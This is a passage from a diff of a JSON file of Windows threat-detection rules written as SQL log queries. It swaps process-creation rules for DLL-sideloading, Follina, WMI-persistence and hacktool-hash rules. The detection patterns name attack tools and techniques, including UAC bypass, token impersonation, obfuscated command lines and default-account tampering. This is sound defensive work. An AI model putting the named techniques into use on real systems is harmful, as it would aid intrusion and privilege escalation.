'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe%' ESCAPE '\\') AND ImageLoaded LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cleanmgr.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\ssshim.dll' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\$WINDOWS.~BT\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\wldp.dll' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_wmiexec_default_powershell.yml" + "filename": "image_load_side_load_from_non_system_location.yml" }, { - "title": "Suspicious PowerShell Parent Process", - "id": "754ed792-634f-40ae-b3bc-e0448d33f695", + "title": "Potential DCOM InternetExplorer.Application DLL Hijack - Image Load", + "id": "f354eba5-623b-450f-b073-0b5b2773b6aa", "status": "test", - "description": "Detects a suspicious or uncommon parent processes of PowerShell", - "author": "Teymur Kheirkhabarov, Harish Segar", + "description": "Detects potential DLL hijack of \"iertutil.dll\" found in the DCOM InternetExplorer.Application Class", + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1021.003" ], "falsepositives": [ - "Other scripts" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%tomcat%' ESCAPE '\\' OR (ParentProcessName LIKE '%\\\\amigo.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\browser.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\jbosssvc.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\microsoftedgecp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MicrosoftEdgeSH.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\safari.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\sqlagent.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\sqlserver.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\sqlservr.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\')) AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR (CommandLine LIKE '%/c powershell%' ESCAPE '\\' OR CommandLine LIKE '%/c pwsh%' ESCAPE '\\') OR Description = 'Windows PowerShell' OR Product = 'PowerShell Core 6' OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_susp_parent_process.yml" + "filename": "image_load_dcom_iertutil_dll_hijack.yml" }, { - "title": "Disabled Volume Snapshots", - "id": "dee4af55-1f22-4e1d-a9d2-4bdc7ecb472a", + "title": "Microsoft VBA For Outlook Addin Loaded Via Outlook", + "id": "9a0b8719-cd3c-4f0a-90de-765a4cb3f5ed", "status": "test", - "description": "Detects commands that temporarily turn off Volume Snapshots", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects outlvba (Microsoft VBA for Outlook Addin) DLL being loaded by the outlook process", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.t1204.002" ], "falsepositives": [ - "Legitimate administration" + "Legitimate macro usage. Add the appropriate filter according to your environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '%\\\\Services\\\\VSS\\\\Diag%' ESCAPE '\\' AND CommandLine LIKE '%/d Disabled%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' AND ImageLoaded LIKE '\\\\outlvba.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_reg_volsnap_disable.yml" + "filename": "image_load_office_outlook_outlvba_load.yml" }, { - "title": "Suspicious Manipulation Of Default Accounts Via Net.EXE", - "id": "5b768e71-86f2-4879-b448-81061cbae951", + "title": "Potential DLL Sideloading Via VMware Xfer", + "id": "9313dc13-d04c-46d8-af4a-a930cc55d93b", "status": "experimental", - "description": "Detects suspicious manipulations of default accounts such as 'administrator' and 'guest'. For example 'enable' or 'disable' accounts or change the password...etc", + "description": "Detects loading of a DLL by the VMware Xfer utility from the non-default directory which may be an attempt to sideload arbitrary DLL", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Some false positives could occur with the admin or guest account. It depends on the scripts being used by the admins in your env. If you experience a lot of FP you could reduce the level to medium" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND CommandLine LIKE '% user %' ESCAPE '\\' AND (CommandLine LIKE '% Järjestelmänvalvoja %' ESCAPE '\\' OR CommandLine LIKE '% Rendszergazda %' ESCAPE '\\' OR CommandLine LIKE '% Администратор %' ESCAPE '\\' OR CommandLine LIKE '% Administrateur %' ESCAPE '\\' OR CommandLine LIKE '% Administrador %' ESCAPE '\\' OR CommandLine LIKE '% Administratör %' ESCAPE '\\' OR CommandLine LIKE '% Administrator %' ESCAPE '\\' OR CommandLine LIKE '% guest %' ESCAPE '\\' OR CommandLine LIKE '% DefaultAccount %' ESCAPE '\\' OR CommandLine LIKE '% \"Järjestelmänvalvoja\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Rendszergazda\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Администратор\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrateur\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrador\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administratör\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrator\" %' ESCAPE '\\' OR CommandLine LIKE '% \"guest\" %' ESCAPE '\\' OR CommandLine LIKE '% \"DefaultAccount\" %' ESCAPE '\\' OR CommandLine LIKE '% ''Järjestelmänvalvoja'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Rendszergazda'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Администратор'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrateur'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrador'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administratör'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrator'' %' ESCAPE '\\' OR CommandLine LIKE '% ''guest'' %' ESCAPE '\\' OR CommandLine LIKE '% ''DefaultAccount'' %' ESCAPE '\\')) AND NOT (CommandLine LIKE '%guest%' ESCAPE '\\' AND CommandLine LIKE '%/active no%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\VMwareXferlogs.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\glib-2.0.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Program Files\\\\VMware\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_net_default_accounts_manipulation.yml" + "filename": "image_load_side_load_vmware_xfer.yml" }, { - "title": "HackTool - SharpLDAPmonitor Execution", - "id": "9f8fc146-1d1a-4dbf-b8fd-dfae15e08541", + "title": "Diagnostic Library Sdiageng.DLL Loaded By Msdt.EXE", + "id": "ec8c4047-fad9-416a-8c81-0f479353d7f6", "status": "experimental", - "description": "Detects execution of the SharpLDAPmonitor. Which can monitor the creation, deletion and changes to LDAP objects.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects both of CVE-2022-30190 (Follina) and DogWalk vulnerabilities exploiting msdt.exe binary to load the \"sdiageng.dll\" library", + "author": "Greg (rule)", "tags": [ - "attack.discovery" + "attack.defense_evasion", + "attack.t1202", + "cve.2022.30190" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\SharpLDAPmonitor.exe' ESCAPE '\\' OR OriginalFileName = 'SharpLDAPmonitor.exe') OR (CommandLine LIKE '%/user:%' ESCAPE '\\' AND CommandLine LIKE '%/pass:%' ESCAPE '\\' AND CommandLine LIKE '%/dcip:%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\sdiageng.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_sharp_ldap_monitor.yml" + "filename": "image_load_dll_sdiageng_load_by_msdt.yml" }, { - "title": "Potential Dosfuscation Activity", - "id": "a77c1610-fc73-4019-8e29-0f51efc04a51", + "title": "Python Py2Exe Image Load", + "id": "cbb56d62-4060-40f7-9466-d8aaf3123f83", "status": "experimental", - "description": "Detects possible payload obfuscation via the commandline", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the image load of Python Core indicative of a Python script bundled with Py2Exe.", + "author": "Patrick St. John, OTR (Open Threat Research)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1027.002" ], "falsepositives": [ - "Unknown" + "Legitimate Py2Exe Binaries", + "Known false positive caused with Python Anaconda" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%^^%' ESCAPE '\\' OR CommandLine LIKE '%^|^%' ESCAPE '\\' OR CommandLine LIKE '%,;,%' ESCAPE '\\' OR CommandLine LIKE '%;;;;%' ESCAPE '\\' OR CommandLine LIKE '%;; ;;%' ESCAPE '\\' OR CommandLine LIKE '%(,(,%' ESCAPE '\\' OR CommandLine LIKE '%\\%COMSPEC:~%' ESCAPE '\\' OR CommandLine LIKE '% c^m^d%' ESCAPE '\\' OR CommandLine LIKE '%^c^m^d%' ESCAPE '\\' OR CommandLine LIKE '% c^md%' ESCAPE '\\' OR CommandLine LIKE '% cm^d%' ESCAPE '\\' OR CommandLine LIKE '%^cm^d%' ESCAPE '\\' OR CommandLine LIKE '% s^et %' ESCAPE '\\' OR CommandLine LIKE '% s^e^t %' ESCAPE '\\' OR CommandLine LIKE '% se^t %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Description = 'Python Core' AND NOT ((NewProcessName LIKE '%Python%' ESCAPE '\\' OR (NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\ProgramData\\\\Anaconda3\\\\%' ESCAPE '\\')) OR (NewProcessName = '')))" ], - "filename": "proc_creation_win_cmd_dosfuscation.yml" + "filename": "image_load_susp_python_image_load.yml" }, { - "title": "Base64 MZ Header In CommandLine", - "id": "22e58743-4ac8-4a9f-bf19-00a0428d8c5f", + "title": "Suspicious WSMAN Provider Image Loads", + "id": "ad1f4bb9-8dfb-4765-adb6-2a7cfb6c0f94", "status": "experimental", - "description": "Detects encoded base64 MZ header in the commandline", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects signs of potential use of the WSMAN provider from uncommon processes locally and remote execution.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.execution" + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.003" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%TVqQAAMAAAAEAAAA%' ESCAPE '\\' OR CommandLine LIKE '%TVpQAAIAAAAEAA8A%' ESCAPE '\\' OR CommandLine LIKE '%TVqAAAEAAAAEABAA%' ESCAPE '\\' OR CommandLine LIKE '%TVoAAAAAAAAAAAAA%' ESCAPE '\\' OR CommandLine LIKE '%TVpTAQEAAAAEAAAA%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (((((ImageLoaded LIKE '%\\\\WsmSvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WsmAuto.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Microsoft.WSMan.Management.ni.dll' ESCAPE '\\') OR OriginalFileName IN ('WsmSvc.dll', 'WSMANAUTOMATION.DLL', 'Microsoft.WSMan.Management.dll')) OR (NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND OriginalFileName = 'WsmWmiPl.dll')) AND NOT (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\System32\\\\sdiagnhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\System32\\\\services.exe' ESCAPE '\\')) OR ((CommandLine LIKE '%svchost.exe -k netsvcs -p -s BITS%' ESCAPE '\\' OR CommandLine LIKE '%svchost.exe -k GraphicsPerfSvcGroup -s GraphicsPerfSvc%' ESCAPE '\\' OR CommandLine LIKE '%svchost.exe -k NetworkService -p -s Wecsvc%' ESCAPE '\\' OR CommandLine LIKE '%svchost.exe -k netsvcs%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\mscorsvw.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\Configure-SMRemoting.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\ServerManager.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Citrix\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\%' ESCAPE '\\'))) AND NOT ((NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND CommandLine = '')))" ], - "filename": "proc_creation_win_susp_inline_base64_mz_header.yml" + "filename": "image_load_wsman_provider_image_load.yml" }, { - "title": "Console CodePage Lookup Via CHCP", - "id": "7090adee-82e2-4269-bd59-80691e7c6338", - "status": "experimental", - "description": "Detects use of chcp to look up the system locale value as part of host discovery", - "author": "_pete_0, TheDFIRReport", + "title": "WMI ActiveScriptEventConsumers Activity Via Scrcons.EXE DLL Load", + "id": "b439f47d-ef52-4b29-9a2f-57d8a96cb6b8", + "status": "test", + "description": "Detects signs of the WMI script host process \"scrcons.exe\" loading scripting DLLs which could indciates WMI ActiveScriptEventConsumers EventConsumers activity.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.discovery", - "attack.t1614.001" + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.003" ], "falsepositives": [ - "During Anaconda update the 'conda.exe' process will eventually execution the 'chcp' command." + "Legitimate event consumers", + "Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '% /c %' ESCAPE '\\' OR ParentCommandLine LIKE '% /r %' ESCAPE '\\' OR ParentCommandLine LIKE '% /k %' ESCAPE '\\') AND NewProcessName LIKE '%\\\\chcp.com' ESCAPE '\\' AND (CommandLine LIKE '%chcp' ESCAPE '\\' OR CommandLine LIKE '%chcp ' ESCAPE '\\' OR CommandLine LIKE '%chcp ' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\vbscript.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemdisp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wshom.ocx' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\scrrun.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_chcp_codepage_lookup.yml" + "filename": "image_load_scrcons_wmi_scripteventconsumer.yml" }, { - "title": "HackTool - SharpImpersonation Execution", - "id": "f89b08d0-77ad-4728-817b-9b16c5a69c7a", - "status": "experimental", - "description": "Detects execution of the SharpImpersonation tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively", - "author": "Sai Prashanth Pulisetti @pulisettis, Nasreddine Bencherchali (Nextron Systems)", + "title": "WMI Persistence - Command Line Event Consumer", + "id": "05936ce2-ee05-4dae-9d03-9a391cf2d2c6", + "status": "test", + "description": "Detects WMI command line event consumers", + "author": "Thomas Patzke", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1134.001", - "attack.t1134.003" + "attack.t1546.003", + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Unknown (data set is too small; further testing needed)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SharpImpersonation.exe' ESCAPE '\\' OR OriginalFileName = 'SharpImpersonation.exe' OR (CommandLine LIKE '% user:%' ESCAPE '\\' AND CommandLine LIKE '% binary:%' ESCAPE '\\') OR (CommandLine LIKE '% user:%' ESCAPE '\\' AND CommandLine LIKE '% shellcode:%' ESCAPE '\\') OR (CommandLine LIKE '% technique:CreateProcessAsUserW%' ESCAPE '\\' OR CommandLine LIKE '% technique:ImpersonateLoggedOnuser%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\wbemcons.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_sharp_impersonation.yml" + "filename": "image_load_wmi_persistence_commandline_event_consumer.yml" }, { - "title": "Suspicious Rundll32 Activity Invoking Sys File", - "id": "731231b9-0b5d-4219-94dd-abb6959aa7ea", - "status": "test", - "description": "Detects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452", - "author": "Florian Roth (Nextron Systems)", + "title": "DLL Load By System Process From Suspicious Locations", + "id": "9e9a9002-56c4-40fd-9eff-e4b09bfa5f6c", + "status": "experimental", + "description": "Detects when a system process (i.e. located in system32, syswow64, etc.) loads a DLL from a suspicious location such as C:\\Users\\Public", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218.011" + "attack.t1070" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND (CommandLine LIKE '%.sys,%' ESCAPE '\\' OR CommandLine LIKE '%.sys %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND (ImageLoaded LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\PerfLogs\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_sys.yml" + "filename": "image_load_susp_dll_load_system_process.yml" }, { - "title": "Group Membership Reconnaissance Via Whoami.EXE", - "id": "bd8b828d-0dca-48e1-8a63-8a58ecf2644f", + "title": "Aruba Network Service Potential DLL Sideloading", + "id": "90ae0469-0cee-4509-b67f-e5efcef040f7", "status": "experimental", - "description": "Detects the execution of whoami.exe with the /group command line flag to show group membership for the current user, account type, security identifiers (SID), and attributes.", + "description": "Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access \"arubanetsvc.exe\" process using DLL Search Order Hijacking", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1033" + "attack.privilege_escalation", + "attack.persistence", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND (CommandLine LIKE '% /groups%' ESCAPE '\\' OR CommandLine LIKE '% -groups%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\arubanetsvc.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\wtsapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcr100.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcp100.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wininet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iphlpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\version.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wldp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\profapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sspicli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dpapi.dll' ESCAPE '\\')) AND NOT ((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_whoami_groups_discovery.yml" + "filename": "image_load_side_load_aruba_networks_virtual_intranet_access.yml" }, { - "title": "TA505 Dropper Load Pattern", - "id": "18cf6cf0-39b0-4c22-9593-e244bdc9a2d4", - "status": "test", - "description": "Detects mshta loaded by wmiprvse as parent as used by TA505 malicious documents", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Iviewers.DLL Sideloading", + "id": "4c21b805-4dd7-469f-b47d-7383a8fcb437", + "status": "experimental", + "description": "Detects potential DLL sideloading of \"iviewers.dll\" (OLE/COM Object Interface Viewer)", + "author": "X__Junior (Nextron Systems)", "tags": [ - "attack.execution", - "attack.g0092", - "attack.t1106" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'mshta.exe'))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\iviewers.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Kits\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Windows Kits\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_ta505_dropper.yml" + "filename": "image_load_side_load_iviewers.yml" }, { - "title": "Renamed Whoami Execution", - "id": "f1086bf7-a0c4-4a37-9102-01e573caf4a0", - "status": "test", - "description": "Detects the execution of whoami that has been renamed to a different name to avoid detection", - "author": "Florian Roth (Nextron Systems)", + "title": "Microsoft Defender Loading DLL from Nondefault Path", + "id": "418dc89a-9808-4b87-b1d7-e5ae0cb6effc", + "status": "experimental", + "description": "Detects loading of Microsoft Defender's DLLs by its processes (MpCmdRun and NisSrv) from the non-default directory which may be an attempt to sideload arbitrary DLL", + "author": "Bhabesh Raj", "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Very unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'whoami.exe' AND NOT (NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\NisSrv.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\mpclient.dll' ESCAPE '\\') AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Defender\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_renamed_whoami.yml" + "filename": "image_load_side_load_windows_defender.yml" }, { - "title": "UAC Bypass via ICMLuaUtil", - "id": "49f2f17b-b4c8-4172-a68b-d5bf95d05130", + "title": "Hacktool Download", + "id": "19b041f6-e583-40dc-b842-d6fa8011493f", "status": "experimental", - "description": "Detects the pattern of UAC Bypass using ICMLuaUtil Elevated COM interface", + "description": "Detects the creation of a file on disk that has an imphash of a well-known hack tool", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.s0139", + "attack.t1564.004" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '%/Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' OR ParentCommandLine LIKE '%/Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}%' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR OriginalFileName = 'WerFault.exe'))" + "SELECT * FROM logs WHERE (Imphash IN ('bcca3c247b619dcd13c8cdff5f123932', '3a19059bd7688cb88e70005f18efc439', 'bf6223a49e45d99094406777eb6004ba', '0c106686a31bfe2ba931ae1cf6e9dbc6', '0d1447d4b3259b3c2a1d4cfb7ece13c3', '1b0369a1e06271833f78ffa70ffb4eaf', '4c1b52a19748428e51b14c278d0f58e3', '4d927a711f77d62cebd4f322cb57ec6f', '66ee036df5fc1004d9ed5e9a94a1086a', '672b13f4a0b6f27d29065123fe882dfc', '6bbd59cea665c4afcc2814c1327ec91f', '725bb81dc24214f6ecacc0cfb36ad30d', '9528a0e91e28fbb88ad433feabca2456', '9da6d5d77be11712527dcab86df449a3', 'a6e01bc1ab89f8d91d9eab72032aae88', 'b24c5eddaea4fe50c6a96a2a133521e4', 'd21bbc50dcc169d7b4d0f01962793154', 'fcc251cceae90d22c392215cc9a2d5d6', '23867a89c2b8fc733be6cf5ef902f2d1', 'a37ff327f8d48e8a4d2f757e1b6e70bc', 'f9a28c458284584a93b14216308d31bd', '6118619783fc175bc7ebecff0769b46e', '959a83047e80ab68b368fdb3f4c6e4ea', '563233bfa169acc7892451f71ad5850a', '87575cb7a0e0700eb37f2e3668671a08', '13f08707f759af6003837a150a371ba1', '1781f06048a7e58b323f0b9259be798b', '233f85f2d4bc9d6521a6caae11a1e7f5', '24af2584cbf4d60bbe5c6d1b31b3be6d', '632969ddf6dbf4e0f53424b75e4b91f2', '713c29b396b907ed71a72482759ed757', '749a7bb1f0b4c4455949c0b2bf7f9e9f', 